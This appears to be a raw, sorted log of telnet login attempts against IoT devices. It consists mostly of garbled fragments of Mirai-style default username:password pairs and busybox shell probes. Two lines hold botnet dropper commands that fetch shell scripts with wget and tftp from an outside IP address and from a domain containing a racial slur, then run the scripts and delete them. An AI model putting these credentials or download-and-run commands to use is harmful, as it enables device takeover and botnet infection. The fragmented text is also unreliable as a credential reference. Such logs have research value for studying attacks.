root:dreambox 
root:dreambox ell:sh 
root:dreamboxe:system 
root:dreambox hell:sh 
root:dreamboystem 
root:drem 
rootech 
root:ell:sh 
rootell:sh 
root:em 
rootem 
root:enable:system 
rootenable:system 
root:e:system 
roote:system 
root:foobar 
root:g 
root:h 
rooth 
root:hell:sh 
roothell:sh 
root:hi3
root:hi3 
root:hi351:54321 
root:hi3518 
root:hi351812345 
root:hi3518 hell:sh 
root:hi3518oot:vizxv 
root:hi35shell:sh 
root:hi35:xc3511 
root:hi3m 
root:hi3shell:sh 
root:hiable:system 
root:hih 
root:i
root:ikwb 
root:ikwbe:system 
root:ikwbshell:sh 
root:ikwbt: 
root:in:1111 
root:in:smcadmin 
rootistrator:1234 
root:j 
root:jble:system 
root:jle:system 
root:jnable:system 
root:jua511 
root:juable:system 
root:juaem 
root:juae:system 
root:juamin:admin1234 
root:juan5 
root:juanin: 
root:juanstem 
root:juant
root:juantble:system 
root:juanteadmin: 
root:juanteble:system 
root:juantec
root:juantech
root: juantech 
root:juantech 
root:juantech888 
root:juantechell:sh 
root:juantech em 
root:juantech enable:system 
root:juantechll:sh 
root:juantech l:sh 
root:juantech m 
root:juantechm 
root:juantechnable:system 
root:juantech oot: 
root:juantech :sh 
root:juantechupport 
root:juantech upport:support 
root:juantecl:sh 
root:juantecm 
root:juantecsh 
root:juantehell:sh 
root:juantel:sh 
root:juantem 
root:juantenable:system 
root:juanteshell:sh 
root:juantessword 
root:juantestem 
root:juantshell:sh 
root:juantsystem 
root:juaroot:xc3511 
root:juem 
root:junable:system 
root:justem 
root:jvbstem 
root:jvbzd
root:jvbzd 
root:jvbzdhell:sh 
root:jvbzdi3518 
root:jvbzd support 
root:klhell:sh 
root:kl:sh 
root:klv12
root:klv123
root:klv123 
root:klv1234 
root:klv123488888 
root:klv123 8 
root:klv123hell:sh 
root:klv123ystem 
root:klv12em 
root:klv1le:system 
root:klvem 
root:klvhell:sh 
root:klvroot:klv1234 
root:klvystem 
root:ko 
root:kt:klv1234 
root:le:system 
rootle:system 
root:ll 
root:ll:sh 
rootll:sh 
root:l:sh 
rootl:sh 
root:m 
rootm 
root:min1234 
rootmin:pass 
root:n 
rootn:12345 
root:nable:system 
rootnable:system 
root: ntech 
rootoot:12345 
root:oot:dreambox 
root:oot:vizxv 
rootoot:xc3511 
rootort:support 
rootot:12345 
root:p
root:p88 
root:pa
root:pa 
root:paealtek 
root:paroot:default 
root:pasell:sh 
root:pass 
root:pass ell:sh 
root:passll:sh 
root:passl:sh 
rootpc 
root:pdmin 
root:pell:sh 
root:port:support 
root:pshell:sh 
rootr 
root:reable:system 
root:reaguest:guest 
root:realt1 
root:realtek 
root:realtekl:sh 
root:realtek:system 
root:realtek ystem 
root:rnable:system 
rootroot:default 
root:root:pass 
rootroot:xc3511 
root:s 
root::sh 
root:sh 
rootsh 
root:shell:sh 
rootshell:sh 
root:sjuantech 
rootsmcadmin 
root:ssword 
root:st:12345 
root: stem 
root:stem 
rootstem 
root:sy:sh 
root:sysot:vizxv 
root::system 
root:system 
rootsystem 
root:system ble:system 
root:system shell:sh 
root:t 
roott 
root:t:12345 
root: tem 
root:tem 
roottem 
root:t:vizxv 
rootuantech 
root::ubnt 
root:uenable:system 
root:user 
rootuser 
root:userell:sh 
root:userhdipc 
root:userll:sh 
root:user pervisor 
root:user sh 
root:us:system 
root:v
root:v 
root:v511 
root:vble:system 
root:vem 
root:ve:system 
root:vi
root:vi 
root:vi:12345 
root:vienable:system 
root:vil:sh 
root:vipassword 
root:vishell:sh 
root:vistrator:meinsm 
root:viz
root:viz12345 
root:vizem 
root:vizll:sh 
root:vizm 
root:vizoot:default 
root:viz:sh 
root:vizshell:sh 
root:vizx 
root:vizx321 
root:vizxe:system 
root:vizxhell:sh 
root:vizxll:sh 
root:vizxoot:anko 
root:vizxot:xc3511 
root:vizxshell:sh 
root:vizx:system 
root:vizxsystem 
root:vizxtem 
root:vizxv 
root:vizxv  
root:vizxv able:system 
root:vizxv ble:system 
root:vizxvdmin 
root:vizxvh 
root:vizxv hell:sh 
root:vizxv ll:sh 
root:vizxvll:sh 
root:vizxv l:sh 
root:vizxvm 
root:vizxvnable:system 
root:vizxv :sh 
root:vizxvtech 
root:vizxv t:ikwb 
root:vizxv vizxv 
root:vizxvystem 
root:vizxystem 
root:vizxzxv 
root:vle:system 
root:vm 
root:vrd 
root:vs 
root:x
root:x 
root:xble:system 
root:xc
root:xc3 
root:xc3:1111 
root:xc334 
root:xc34 
root:xc35
root:xc351
root:xc3511
root:xc3511 
root:xc3511  
root:xc351:1111 
root:xc3511 45 
root:xc3511 able:system 
root:xc3511 dmin:meinsm 
root:xc3511 ell:sh 
root:xc3511 e:system 
root:xc3511 h 
root:xc3511hell:sh 
root:xc3511juantech 
root:xc3511 l:sh 
root:xc3511 m 
root:xc3511 min:meinsm 
root:xc3511pass 
root:xc3511sword 
root:xc3511t:user 
root:xc35188888 
root:xc351ble:system 
root:xc351hell:sh 
root:xc351ministrator:meinsm 
root:xc351sh 
root:xc351shell:sh 
root:xc351:xc3511 
root:xc35admin1:password 
root:xc35ble:system 
root:xc35ell:sh 
root:xc35em 
root:xc35hell:sh 
root:xc35nable:system 
root:xc35xc3511 
root:xc3ell:sh 
root:xc3em 
root:xc3hell:sh 
root:xc3le:system 
root:xc3m 
root:xc3min:123456 
root:xc3oot:juantech 
root:xc3ot:12345 
root:xc3shell:sh 
root:xc888:888888 
root:xcadmin1:password 
root:xcenable:system 
root:xchell:sh 
root:xcjMko0admin 
root:xct 
root:xctem 
root:xcxv 
root:xell:sh 
root:xem 
root:xl:sh 
root:xm
root:xm 
root:xmable:system 
root:xmh
root:xmhde:system 
root:xmhdiem 
root:xmhdihell:sh 
root:xmhdip
root:xmhdipc 
root:xmhdipc  
root:xmhdipcble:system 
root:xmhdipcc3511 
root:xmhdipc enable:system 
root:xmhdipcenable:system 
root:xmhdipce:system 
root:xmhdipchdipc 
root:xmhdipc hell:sh 
root:xmhdipc ll:sh 
root:xmhdipc ot:12345 
root:xmhdipell:sh 
root:xmhdiphell:sh 
root:xmhdish 
root:xmhdishell:sh 
root:xmhdi:system 
root:xmhin:7ujMko0admin 
root:xministrator:1234 
root:xml:sh 
root:xm:system 
root:xmystem 
root:xo 
root:xstem 
root:xtem 
root:xt:klv123 
root:xystem 
root:ystem 
rootystem 
root:zl:sh 
root:zlx 
root:zlxx
root:zlxx. 
root:zlxxll:sh 
root:zlxx. l:sh 
root:zlxx.l:sh 
root:zlxx.shell:sh 
root:zshell:sh 
root:Zte521 
root:Zte5ll:sh 
root:Ztl:sh 
root:zxv 
roo:vizxv 
rooxc3511 
rooystem 
ror 
ro:sh 
rosh 
roshell:sh 
rostem 
rosupport:support 
ro:system 
rosystem 
rot: 
rot:anko 
rotem 
rot:xc3511 
roult 
roystem 
rr 
rroot:jvbzd 
rroot:xmhdipc 
rs 
r:sh 
rsh 
rstem 
r:system 
rsystem 
rt:1111 
rtem 
rvice 
rvice:service 
rvizxv 
rxc3511 
rystem 
s
s 
s1 
s21 
s234 
s321 
s56 
s88 
sable:system 
sadmin 
sadmin:pass 
sadmin:password 
sble:system 
sch 
sdmin:1111 
sele:system 
sem 
senable:system 
serpport 
sersystem 
servic
servic1 
serviceenable:system 
servicel:sh 
service:ser 
service:servic 
service:servic4 
service:servicable:system 
service:service 
service:service system 
service:servichell:sh 
service:servicl:sh 
service:servstem 
service:sstem 
service:stem 
servic:password 
servicsystem 
servictem 
serv:system 
servsystem 
se:system 
setem 
sh
:sh 
sh 
sh:
sh00 
sh1 
sh1234 
sh321 
sh:54321 
sh8 
shable:system 
shadmin 
sh:/b 
sh:/bem 
sh:/bin/btopia:netopia 
sh:/bin/bu1234 
sh:/bin/bus
sh:/bin/busybo
sh:/bin/busybot:xc3511 
sh:/bin/busybox MIRAI 
sh:/bin/busybox VDOSS 
sh:/bin/busybox VDOSS/bin/busybox VDOSS 
sh:/bin/busybox VDOSSshell 
sh:/bin/busybox VDOSS ystem 
sh:/bin/busyboxwb 
sh:/bin/b:xc3511 
sh:/bin/c3511 
sh:/bin/sh 
shble:system 
shch 
she
she 
she00000 
she1 
she111111 
she12345 
she34 
she345 
she4 
she45 
she:54321 
sheable:system 
she:anko 
sheble:system 
shedmin 
shedmin:password 
sheell:sh 
sheem 
sheenable:system 
shee:system 
sheguest:guest 
sheh 
shehell:sh 
shein:12345 
shein:password 
sheko0admin 
shel
shel 
shel: 
shel1 
shel666 
shel888888 
shelable:system 
sheladmin:hello 
sheladministrator:1234 
shelanko 
shelble:system 
shelce 
shelch 
sheld 
sheldipc 
shelech 
shelell:sh 
shelem 
shelenable:system 
shele:service 
shele:system 
shelguest:12345 
shelh 
shelhell:sh 
shelice:service 
shelipc 
shell
shell 
shell:
shell: 
shell::12345 
shell:21 
shell:234 
shell234 
shell:2345 
shell34 
shell:3511 
shell:54321 
shell6 
shell:888 
shell:able:system 
shellable:system 
shelladmin 
shell:admin1234 
shelladmin1234 
shell:anko 
shell:ble:system 
shellble:system 
shellch 
shelld 
shellech 
shell:ell:sh 
shellell:sh 
shell:em 
shell:enable 
shell:enable:system 
shellenable:system 
shell:ervisor 
shell:e:system 
shelle:system 
shell:h 
shellh 
shell:hell:sh 
shellhell:sh 
shell:izxv 
shellko0admin 
shell:le:system 
shellle:system 
shell:ll:sh 
shellll:sh 
shell:l:sh 
shelll:sh 
shelllt 
shell:m 
shellm 
shell:min 
shell:n 
shell:n:1234 
shelln:12345 
shell:nable:system 
shellnable:system 
shellnko 
shell:n:password 
shellntech 
shell:oot:12345 
shell:oot:888888 
shell:oot:anko 
shell:oot:klv1234 
shell:ord 
shellot:1111 
shellot:7ujMko0admin 
shellot:jvbzd 
shell:ot:vizxv 
shellot:xc3511 
shell:ot:xmhdipc 
shell::pass 
shell::password 
shell:password 
shell:rd 
shell:root: 
shellroot:12345 
shellroot:888888 
shellroot:klv123 
shell:root:xmhdipc 
shell:rt 
shell:rt:support 
shellrt:support 
shell:s
shell:s 
shell:s: 
shell:s1234 
shell:s:12345 
shell:s521 
shell:s:666666 
shell:s666666 
shell:sable:system 
shell:sadmin:admin1234 
shell:sadmin:password 
shell:sble:system 
shell:sell:sh 
shell:sem 
shell:senable:system 
shellser 
shellser:user 
shell:se:system 
shell:sfault 
shell:sh
shell::sh 
shell:sh 
shell:sh  
shellsh 
shell:sh1 
shell:sh 111 
shell:sh :1111 
shell:sh 34 
shell:sh34 
shell:sh345 
shell:sh8888 
shell:sh888888 
shell:sh888888:888888 
shell:sh able:system 
shell:shable:system 
shell:shadmin:password 
shell:sh ble:system 
shell:shble:system 
shell:sh || cd /var/run || cd /dev/shm || cd /mnt || cd /var; wgeEJAK1V.sh; tftp -r tJNF55X.sh -g 185.47.62.44; sh tJNF55Xrm -rf tJNF55X.sh FCn3zPT.sh lEJAK1V.sh 
shell:shdipc 
shell:sh dmin1234 
shell:sh efault 
shell:sh ell:sh 
shell:shell:sh 
shellshell:sh 
shell:sh em 
shell:shem 
shell:sh enable:system 
shell:shenable:system 
shell:sh est:12345 
shell:sh e:system 
shell:she:system 
shell:sh h 
shell:shh 
shell:sh hell:sh 
shell:shhell:sh 
shell:shin:admin1234 
shell:shjuantech 
shell:sh le:system 
shell:shle:system 
shell:sh ll:sh 
shell:shll:sh 
shell:sh l:sh 
shell:shl:sh 
shell:shlt 
shell:sh m 
shell:shm 
shell:sh min:1111 
shell:sh min:admin1234 
shell:sh nable:system 
shell:shnable:system 
shell:sh n:smcadmin 
shell:shoot:54321 
shell:shoot:888888 
shell:shoot:vizxv 
shell:shoot:xc3511 
shell:sh ort:support 
shell:shot:7ujMko0admin 
shell:shot:klv123 
shell:sh ot:vizxv 
shell:sh r 
shell:shroot:888888 
shell:sh root:klv1234 
shell:shroot:Zte521 
shell:sh :service 
shell:sh :sh 
shell:sh sh 
shell:sh:sh 
shell:shsh 
shell:sh shell:sh 
shell:shshell:sh 
shell:shsor 
shell:sh stem 
shell:shstem 
shell:sh support 
shell:shsword 
shell:sh :system 
shell:sh system 
shell:sh:system 
shell:shsystem 
shell:sht:54321 
shell:sh tem 
shell:shtem 
shell:sh t:support 
shell:sh t:vizxv 
shell:sh t:xc3511 
shell:sht:xmhdipc 
shell:shuest:guest 
shell:sh upport 
shell:shv 
shell:sh visor 
shell:sh xv 
shell:shxv 
shell:sh ystem 
shell:shystem 
shell:sh zxv 
shell:sin:password 
shell:sizxv 
shell:sle:system 
shell:sll:sh 
shell:sl:sh 
shell:sm 
shell::smcadmin 
shell:sn 
shell:snable:system 
shell:sn:pass 
shell:sot:888888 
shell:sot:anko 
shell:sot:juantech 
shell:spervisor:supervisor 
shell:sroot:pass 
shell:sroot:vizxv 
shell:srt 
shell:ss 
shell:s:sh 
shell:ssh 
shell:sshell:sh 
shell:sss 
shell:sstem 
shell:s:system 
shell:ssystem 
shell:stem 
shellstem 
shellst:guest 
shell:sther:fucker 
shell:st:user 
shell:sult 
shell:support 
shell:support:support 
shell:svizxv 
shell::system 
shell:system 
shellsystem 
shell:szlxx. 
shell:t:54321 
shell:t:666666 
shellt:888888 
shell:tem 
shelltem 
shell:t:ikwb 
shell:t:ubnt 
shell:t:xmhdipc 
shell:v123 
shell:vizxv 
shellword 
shell:xmhdipc 
shell:xv 
shell:ystem 
shellystem 
shellzd 
shelm 
shelmcadmin 
sheln 
sheln:54321 
shelnable:system 
sheloot:anko 
sheloot:default 
shelot: 
shelpass 
shelpc 
shelport 
shelpport 
shelroot:888888 
shelroot:vizxv 
shel:sh 
shelsh 
shelshell:sh 
shelstem 
shelsupport:support 
shel:system 
shelsystem 
sheltem 
sheluantech 
shelvice 
shelystem 
shelzxv 
shem 
shen1234 
shenable:system 
sheo 
sheoot:pass 
sheot:juantech 
sheot:xc3511 
shepport 
shert:support 
shervice:service 
she:sh 
shesh 
sheshell:sh 
she:smcadmin 
shess 
shestem 
she:supervisor 
shesupport:support 
she:system 
shesystem 
shetem 
shet:vizxv 
shet:xc3511 
shev 
shh 
shin: 
shizxv 
shle:system 
shll:sh 
shl:sh 
shm 
shn1234 
shnable:system 
shoot:xc3511 
shot: 
shot:xmhdipc 
shroot:dreambox 
shroot:system 
sh:sh 
shsh 
shshell:sh 
shstem 
sh:system 
shsystem 
sht:54321 
shtem 
shult 
shxc3511 
sh:xmhdipc 
shystem 
sin:123456 
sle:system 
sll:sh 
sl:sh 
slt 
sm 
smhdipc 
snable:system 
sn:smcadmin 
soot:anko 
spassword 
spc 
sroot: 
sroot:666666 
sroot:pass 
sroot:vizxv 
srvice 
ss 
s:sh 
ssh 
sss 
sstem 
s:system 
ssystem 
st 
st: 
st:1111 
st:default 
stem 
st:ikwb 
su
su 
sull:sh 
sun 
sun:123456 
sunable:system 
sup 
supell:sh 
super:super 
super:surt 
superv
superv 
supervenable:system 
supervis4 
:supervisor 
supervisor:e:system 
supervisor:s:sh 
supervisor:su
supervisor:sup1234 
supervisor:supeem 
supervisor:supervi1 
supervisor:supervible:system 
supervisor:supervinet 
supervisor:supervis8888 
supervisor:supervisohell:sh 
supervisor:supervisoot:xmhdipc 
supervisor:supervisor 
supervisor:supervm 
supervisor:system 
supe:system 
suph 
suple:system 
supmin: 
suppass 
suppem 
suppe:system 
suppo
suppooot:vizxv 
suppoot:888888 
suppor
suppor56 
supporell:sh 
supporle:system 
supporl:sh 
supporsystem 
support 
support:1111 
support:em 
supportenable:system 
supporth 
support:hell:sh 
support:ikwb 
support:in:smcadmin 
support:klv123 
support:le:system 
supportll:sh 
support:sem 
support::sh 
support:sot:anko 
support:sroot:klv123 
support:sstem 
support:su511 
support:su6 
support:su666666 
support:suadmin:1111 
support:suefault 
support:sup 
support:supp 
support:suppoenable:system 
support:supporshell:sh 
support:support
support:support 
support:supportdmin 
support:supportell:sh 
support:support em 
support:supporte:system 
support:support hdipc 
support:support l:sh 
support:support :sh 
support:support sh 
support:supportsh 
support:supportsystem 
support:support t:12345 
support:support ystem 
support:supportystem 
support:supposystem 
support:suppsupport:support 
support:sut:xc3511 
supporystem 
supposystem 
suppotem 
suppoystem 
supp sh tftp.sh; wget http://neger.dingle.dog/bin.sh; sh bin..sh 
suppsystem 
sup:system 
supystem 
suubnt:ubnt 
sword 
sxv 
:system 
system 
t 
t:00000000 
t:888888 
teable:system 
tech 
tech:tecech 
tech:tech
tech:tech 
tech:tech34 
tech:techenable:system 
tech:tech nable:system 
tech:tecot:vizxv 
tech:tecpport:support 
tech:tect:888888 
tec:vizxv 
telnet:telnet 
telnet:teln:meinsm 
tem 
t:system 
t:xmhdipc 
tystem 
u:666666 
ubem 
ubin/busybox VDOSS 
ubnh 
ubnt:ubnt 
ubnt:ubnte:system 
ubnt:ubnt :sh 
ubnt:ubntstem 
ubnt:ureambox 
ubnt:ushell:sh 
ubnuantech 
uem 
uenable:system 
uest:12345 
ult 
upport 
use
useenable:system 
usemhdipc 
usenable:system 
user
:user 
user 
user:
user1111 
user:12345 
user:7ujMko0vizxv 
user:888888 
user:d
user:defaultshell 
user:ggdaseuaimhrke 
user:helpme 
user:l 
userle:system 
userll:sh 
user:m 
userm 
user:pass 
user:password 
user:root:juantech 
user:shell:sh 
user:t:support 
user:uem 
user:ul:sh 
user:us
user:us 
user:usem 
user:user 
user:user  
user:user 1111 
user:usershell:sh 
user:user:support 
user:use:vizxv 
user:ush 
user:uspc 
user:uystem 
usestem 
ushell:sh 
ustem 
usystem 
uystem 
v 
visor 
:vizxv 
vizxv 
ystem 
